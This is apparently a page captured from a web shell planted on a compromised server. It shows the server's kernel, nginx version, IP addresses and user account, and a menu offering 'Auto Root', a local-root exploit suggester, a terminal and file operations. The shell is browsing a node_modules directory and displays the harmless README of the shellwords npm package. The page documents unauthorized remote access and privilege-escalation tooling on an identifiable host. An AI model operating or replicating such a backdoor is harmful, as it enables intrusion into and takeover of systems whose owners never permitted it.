Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.80.46
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-musonza /
node_modules /
shellwords /
Delete
Unzip
Name
Size
Permission
Date
Action
lib
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
LICENSE
1.03
KB
-rw-r--r--
2017-08-17 08:32
README.md
539
B
-rw-r--r--
2017-08-17 08:32
package.json
1.46
KB
-rw-r--r--
2021-02-04 21:24
Save
Rename
# Shellwords Shellwords provides functions to manipulate strings according to the word parsing rules of the UNIX Bourne shell. It is based on [the Ruby module of the same name](http://www.ruby-doc.org/stdlib-1.9.3/libdoc/shellwords/rdoc/Shellwords.html). ## Installation Add "shellwords" to your `package.json` file and run `npm install`. ## Example ``` javascript var shellwords = require("shellwords"); shellwords.split("foo 'bar baz'"); // ["foo", "bar baz"] shellwords.escape("What's up, yo?"); // 'What\\\'s\\ up,\\ yo\\?' ```